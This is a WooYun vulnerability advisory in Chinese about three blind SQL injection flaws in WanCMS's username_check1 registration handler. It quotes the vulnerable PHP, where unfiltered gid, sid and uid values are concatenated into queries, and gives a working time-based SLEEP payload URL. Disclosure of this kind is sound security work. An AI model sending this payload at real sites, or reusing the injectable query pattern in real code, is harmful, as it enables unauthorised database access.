漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:wancms sql盲注三处(比较鸡肋)
提交时间:2015-10-12 11:07
修复时间:2016-01-15 11:09
公开时间:2016-01-15 11:09
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情 披露状态:
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技 、唐朝安全巡航 ) 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
简要描述:
详细说明: /app/Lib/Action/AccountsAction.class.php //118行
public function username_check1() { unset ( $_SESSION ['uid'] ); unset ( $_SESSION ['member'] ); cookie ( 'auth', '1' ); $html = uc_user_synlogout (); $callback = isset ( $_GET ['jsonpCallback'] ) ? $_GET ['jsonpCallback'] : 'jsonpCallback'; $gid = htmlspecialchars($_GET['gid']); //并没有过滤 //若sid、uid 丢失 获取相应最新的开服 uid默认为平台默认推广账号 $uid_1 = htmlspecialchars($_GET['uid']); //推广编号 查询出他的上级id//这个同样是没有过滤 $username = strtolower(trim(htmlspecialchars($_GET ['cn']))); $password = trim ( htmlspecialchars($_GET ['pwd']) ); $domain = $this->getdomain($_SERVER['HTTP_HOST']); $email = $username.'@'.$domain; if (! preg_match ( "/^([a-zA-Z0-9]|[._]){5,22}$/", $username )) { $data = "{\"result\":\"err0003\"}"; echo $callback . '(' . $data . ')';die(); } if (strlen ( $password ) < 6 || strlen ( $password ) > 22 || $password == "") { $data = "{\"result\":\"err0006\"}"; echo $callback . '(' . $data . ')';die(); } // #### 接入UC ##### $uid = uc_user_register($username,$password,$email); $uid=321; if ($uid <= 0) { if ($uid == - 1) { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } elseif ($uid == - 2) { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } elseif ($uid == - 3) { $data = "{\"result\":\"err0003\"}"; echo $callback . '(' . $data . ')';die(); } elseif ($uid == - 4) { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } elseif ($uid == - 5) { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } elseif ($uid == - 6) { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } else { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } } else{ // 注册成功 $userinfo ['username'] = $username; $userinfo ['nickname'] = $username; $userinfo ['email'] = $email; $userinfo ['point'] = "0"; $userinfo ['id_card'] = ''; $userinfo ['uid'] = $uid; $model = M ( 'member' ); if ($model->add ($userinfo)) { $extend = M ( 'member_extend_info' ); $extends_info ['uid'] = $uid; $extends_info ['register_time'] = time (); $extends_info ['register_ip'] = get_client_ip (); $extends_info ['lastlogin_time'] = time (); $extends_info ['lastlogin_ip'] = get_client_ip (); $extends_info ['realname'] = ''; $extends_info ['from_soical'] = 'cps'; $extends_info ['gid'] = $gid; $extends_info ['sid'] = htmlspecialchars($_GET['sid']); $smodel = M('server'); if($extends_info ['sid']){ $extends_info ['sid'] = htmlspecialchars($_GET['sid']); //这也没过滤 }else{ $s_info= $smodel->where("status = '0' and gid = ".$gid)->order('add_time desc')->select(); $extends_info ['sid'] =$s_info[0]['sid']; } //确保sid与gid是同一款游戏 $s_info1= $smodel->where("sid = ".$extends_info ['sid'])->find(); //这是第三处 if($s_info1['gid']!=$extends_info ['gid']){ $s_info= $smodel->where("status = '0' and gid = ".$gid)->order('add_time desc')->select(); //这是第一处 $extends_info ['sid'] =$s_info[0]['sid']; } $sid = $extends_info ['sid']; //推广链接本身就是一级公会链接 if($uid_1){ $info = $extend->where (' grouping = 1 and uid ='.$uid_1)->find (); //这是第二处 if (empty($info)) { $extends_info ['sub_channels'] = '4'; $extends_info ['total_channels'] = '4'; }else{ $extends_info ['sub_channels'] = $uid_1; if($info['subsign']=='0'){ $extends_info ['total_channels'] = $uid_1; }else{ $extends_info ['total_channels'] = $info['subsign']; } } }else{ $extends_info ['sub_channels'] = '4'; $extends_info ['total_channels'] = '4'; } $extend->add($extends_info); // 设置cookies setcookie ('auth', uc_authcode ( $uid . "\t" . $username, 'ENCODE' ), 0, C ( 'COOKIE_PATH' ), C ( 'COOKIE_DOMAIN' ), 0, false ); setcookie ( 'name', $username, time () + 3600, "/" ); /** * ********************************** */ // 防止本机注册 import ( "@.ORG.Getmacaddr" ); $mac = new GetMacAddr ( PHP_OS ); $ip = get_client_ip (); $macaddr = $mac->mac_addr; setcookie ( "gameplf_anti_csrf", md5 ( $macaddr ), time () + 3600 * 24, "/" ); setcookie ( "login_check_ip", md5 ( $ip ), time () + 3600 * 24, "/" ); $ucsynlogin = uc_user_synlogin ( $uid ); $_SESSION ['uid'] = $uid; $_SESSION ['member'] = $username; $ucsynlogin =str_replace('"', "'", $ucsynlogin); $data="{\"result\":\"success\",\"gid\":\"$gid\",\"fid\":\"$sid\",\"login\":\"$ucsynlogin\"}"; echo $callback . '(' . $data . ')';die(); } else { $data = "{\"result\":\"err0001\"}"; echo $callback . '(' . $data . ')';die(); } } }
这三处都没过滤,但是有个问题,已经注册过的用户是不能再注册的。 所以每次注入的时候都必须使用不同的用户名来进行注入。 而且页面不回显,只能盲注了。 这个必须写脚本才能测试。所以比较鸡肋,但是注入还是存在的 给个payload测试一下。 http://localhost/accounts/username_check1/?gid=1&cn=test1ees&pwd=111111&sid=0&uid=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
漏洞证明: 修复方案: 版权声明:转载请注明来源 不能忍 @乌云
漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2016-01-15 11:09
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态: 暂无
漏洞评价:
评价